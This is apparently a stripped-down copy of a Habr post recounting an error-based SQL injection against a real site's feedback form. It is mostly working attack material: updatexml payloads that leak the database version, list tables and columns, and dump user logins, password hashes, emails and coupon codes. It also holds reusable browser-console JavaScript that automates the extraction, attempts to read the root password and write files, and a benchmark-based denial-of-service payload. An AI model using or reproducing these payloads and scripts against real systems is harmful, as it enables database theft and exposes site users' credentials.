Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; at line 1 SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0', '1', '0', '2015-08-04 11:36:37', '', 'Max', '< >@gmail.com', '', ', '<>@B.ru' .', '', '2015-08-04 11:36:37', '0000-00-00 00:00:00', '0');
UpdateXML(xml_target, xpath_expr, new_xml) — MySQL's XML-update function; a malformed xpath_expr is reported back verbatim in the error text, as the console session below shows.
mysql> select updatexml(1, '123', 0) from dual;
+------------------------+
| updatexml(1, '123', 0) |
+------------------------+
| NULL                   |
+------------------------+
1 row in set (0,00 sec)

mysql> select updatexml(1, '~123', 0) from dual;
ERROR 1105 (HY000): XPATH syntax error: '~123'
message' or updatexml(1,concat(0x7e,(version())),0) or '', '0000-00-00 00:00:00', '0000-00-00 00:00:00', '1');--'
' or updatexml(1,concat(0x7e,(version())),0) or '
Error displaying the error page: Application Instantiation Error: XPATH syntax error: '~5.5.41-MariaDB-log' SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0', '1', '0', '2015-08-04 12:39:12', '', 'Ken', 'ken@mailinator.com', '', '' or updatexml(1,concat(0x7e,(version())),0) or '', '', '2015-08-04 12:39:12', '0000-00-00 00:00:00', '0');
version: 5.5.41-MariaDB-log
hostname: db-www
user: A@ABru
database: A
' or updatexml(0, concat(0x7e,(SELECT password FROM mysql.user WHERE user='root')), 0) or '
Error displaying the error page: Application Instantiation Error: SELECT command denied to user 'A'@'ABru' for table 'user' SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0', '1', '0', '2015-08-04 14:27:21', '', 'Ken', 'ken@mailinator.com', '', '' or updatexml(0, concat(0x7e,(SELECT password FROM mysql.user WHERE user='root')), 0) or '', '', '2015-08-04 14:27:21', '0000-00-00 00:00:00', '0');
' or updatexml(0, concat(0x7e,(SELECT concat(table_schema, ':', table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0, 1)), 0) or '
aa:cart aa:category aa:includes aa:items aa:layout aa:menu aa:aabb_ak_profiles aa:aabb_ak_stats aa:aabb_ak_storage aa:aabb_assets aa:aabb_associations aa:aabb_banner_clients aa:aabb_banner_tracks aa:aabb_banners aa:aabb_categories aa:aabb_com_feedback aa:aabb_com_photo_votes aa:aabb_com_photo_votes_comment aa:aabb_com_photo_votes_likes aa:aabb_com_wishlist
$.getScript('https://raw.githubusercontent.com/caolan/async/master/lib/async.js'); (function() { var ans_start = " '~", // ans_stop = "' SQL=", // lim = 20, start_from = 0; // AJAX- async.times(lim, function(i, next) { var injection = "' or updatexml(0, concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit "+ (start_from + i) +", 1)), 0) or '"; $.ajax({ url: '/feedback/post.php', method: 'POST', data: $.param({ data_email: 'undefined', data_email_body: 'undefined', data_email_subject: 'A B', type: 'feedback', name: 'Test', mail: 'test@mailinator.com', phone: '', feedbacktext: injection, else: '', recipient: 'A@B.ru', btn: '' }), success: function(resp) { next(null, resp.substring(resp.indexOf(ans_start) + ans_start.length, resp.indexOf(ans_stop))); }, error: function(jqXHR, textStatus) { next(textStatus); } }); }, function(err, results) { // if (err) return console.error(err); window.INJ_RESULTS = results; // , , - - console.log(results.join('\n')); // }); })();
aa:cart aa:category <...> aa:aabb_finder_links aa:aabb_finder_links_terms0 aa:aabb_finder_links_terms1 <...> aa:aabb_jcomments_votes aa:aabb_jsecurelog aa:aabb_jshopping_addons <...> aa:aabb_jshopping_coupons <...> aa:aabb_jshopping_shipping_meth <...> aa:aabb_jshopping_usergroups aa:aabb_jshopping_users <...> aa:aabb_usergroups aa:aabb_users aa:aabb_viewlevels aa:aabb_weblinks aa:aabb_wf_profiles aa:aabb_xmap_items aa:aabb_xmap_sitemap aa:modules aa:orders aa:oshibka aa:params aa:reviews aa:slideshow aa:users
' or updatexml(0, concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1)), 0) or '
id, login, password, email, tel, name, firma, active, date, role
' or updatexml(0, concat(0x7e,(SELECT CONCAT_WS(':',id,login,password) FROM users LIMIT 0,1)), 0) or '
$.getScript('https://raw.githubusercontent.com/caolan/async/master/lib/async.js'); // , var ANS_START = " '~", ANS_STOP = "' SQL=", ANS_ERR = "Er", ANS_LIM = 31; // // start_from lim // construct_req - , function ajax93t411(start_from, lim, construct_req) { // start_from = start_from || 0; lim = lim || 1; // . i, offset - construct_req function req(i, offset, callback) { $.ajax({ url: '/feedback/post.php', method: 'POST', data: $.param({ data_email: 'undefined', data_email_body: 'undefined', data_email_subject: 'A B', type: 'feedback', name: 'Test', mail: 'test@mailinator.com', phone: '', feedbacktext: construct_req(start_from, i, offset), else: '', recipient: 'A@B.ru', btn: '' }), success: function(resp) { callback(null, resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP))); }, error: function(jqXHR, textStatus) { callback(textStatus); } }); } // 31, // , function constructReq(i, full_answer, offset, next) { req(i, offset, function(err, answer) { if (err) return next(err, full_answer); full_answer += answer; if (answer.length == ANS_LIM) { constructReq(i, full_answer, offset + ANS_LIM, next); } else { next(null, full_answer); } }); } // async.timesSeries(lim, function(i, next) { constructReq(i, '', 1, next); }, function(err, results) { if (err) return console.error(err); window.INJ_RESULTS = results; console.log(results.join(', ')); }); }
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',id,login,password,email), "+ offset +", "+ ANS_LIM +") FROM users LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj)
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',username,email,password), "+ offset +", "+ ANS_LIM +") FROM aabb_users LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj)
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',coupon_code,coupon_value,coupon_start_date,coupon_expire_date), "+ offset +", "+ ANS_LIM +") FROM aabb_jshopping_coupons LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj)
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':', table_schema, table_name), "+ offset +", "+ ANS_LIM +") FROM information_schema.tables LIMIT "+ (start_from + i) +", 1)), 0) or '" } ajax93t411(62, 100, inj); // 62 - information_schema ajax93t411(162, 100, inj);
mysql> create database test;
Query OK, 1 row affected (0,06 sec)

mysql> create table t(id int, msg text);
Query OK, 0 rows affected (0,70 sec)

mysql> insert into t values (1, 'msg');
Query OK, 1 row affected (0,06 sec)

mysql> select * from t;
+------+------+
| id   | msg  |
+------+------+
|    1 | msg  |
+------+------+
1 row in set (0,00 sec)
mysql> insert into t values (1, '' or updatexml(1, concat('~', version()), 0) or '');
ERROR 1105 (HY000): XPATH syntax error: '~5.6.25-0ubuntu0.15.04.1'

mysql> insert into t values (1, '' or updatexml(1, concat('~', '1234567890123456789012345678901234567890'), 0) or '');
ERROR 1105 (HY000): XPATH syntax error: '~1234567890123456789012345678901'
mysql> select 1 from dual into outfile 'test.txt';
Query OK, 1 row affected (0,00 sec)

$ sudo ls -la /var/lib/mysql/test/
124
drwx------  2 mysql mysql  4096 . 11 18:07 .
drwx------ 12 mysql mysql  4096 . 11 17:50 ..
-rw-rw----  1 mysql mysql    65 . 11 17:50 db.opt
-rw-rw-rw-  1 mysql mysql     2 . 11 18:07 test.txt
-rw-rw----  1 mysql mysql  8584 . 11 17:52 t.frm
-rw-rw----  1 mysql mysql 98304 . 11 17:52 t.ibd

mysql> insert into t values (1, '' or updatexml(1, concat('~', (select 1 from dual into outfile 'test.txt')), 0) or '');
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile 'test.txt')), 0) or '')' at line 1
mysql> LOAD DATA INFILE 'test.txt' into table t;
Query OK, 1 row affected, 1 warning (0,08 sec)
Records: 1  Deleted: 0  Skipped: 0  Warnings: 1

mysql> select * from t;
+------+------+
| id   | msg  |
+------+------+
|    1 | msg  |
|    1 | NULL |
+------+------+
2 rows in set (0,00 sec)
mysql> insert into t values (1, '' or updatexml(1, concat('~', (LOAD DATA INFILE 'test.txt' into table t)), 0) or '');
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD DATA INFILE 'test.txt' into table t)), 0) or '')' at line 1

mysql> insert into t values (1, '' or updatexml(1, concat('~', (LOAD DATA INFILE 'test.txt')), 0) or '');
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD DATA INFILE 'test.txt')), 0) or '')' at line 1
var ANS_START = " '~", ANS_STOP = "' SQL=", ANS_LIM = 31; function ajax93t411(start_from, lim, construct_req) { start_from = start_from || 0; lim = lim || 1; // Can be -1. -1 if for "while no Err" function req(i, offset, callback) { $.ajax({ //-- All this params is for customization. Feel free url: '/feedback/post.php', method: 'POST', data: $.param({ data_email: 'undefined', data_email_body: 'undefined', data_email_subject: 'A B', type: 'feedback', name: 'Test', mail: 'test@mailinator.com', phone: '', feedbacktext: construct_req(start_from, i, offset), // Don't forget about this function to include else: '', recipient: 'A@B.ru', btn: '' } //--- ), success: function(resp) { var answer = resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP)); if (answer == ANS_ERR) { callback(answer); } else { callback(null, answer); } }, error: function(jqXHR, textStatus) { callback(textStatus); } }); } function constructReq(i, full_answer, offset, next) { req(i, offset, function(err, answer) { if (err) return next(err, full_answer); full_answer += answer; if (answer.length > 0) { constructReq(i, full_answer, offset + answer.length, next); } else { $('body').append('<p>'+ full_answer +'</p>'); // Include each new result into webpage of target site. Just for usability. next(null, full_answer); } }); } function timesSeries(lim, i, results, callback) { if (i < lim) { constructReq(i, '', 1, function(err, answer) { if (err) return callback(err, results); results.push(answer); timesSeries(lim, i + 1, results, callback); }); } else { callback(null, results); } } function untilErrSeries(i, results, callback) { constructReq(i, '', 1, function(err, answer) { if (err) return callback(err, results); results.push(answer); untilErrSeries(i + 1, results, callback); }); } function complete(err, results) { if (err) console.error(err); window.INJ_RESULTS = results; // Keep all results into the global variable. Just for usability. 
console.log('Done'); } $('body').append('<p><b>New Request!</b></p>'); if (lim > 0) { timesSeries(lim, 0, [], complete); } else { // lim < 0 untilErrSeries(0, [], complete); } }
' or updatexml(0, concat(0x7e,(select benchmark(10000000000000000000000000000000000000000000000, encode('hello', 'world')))), 0) or '
Source: https://habr.com/ru/post/264579/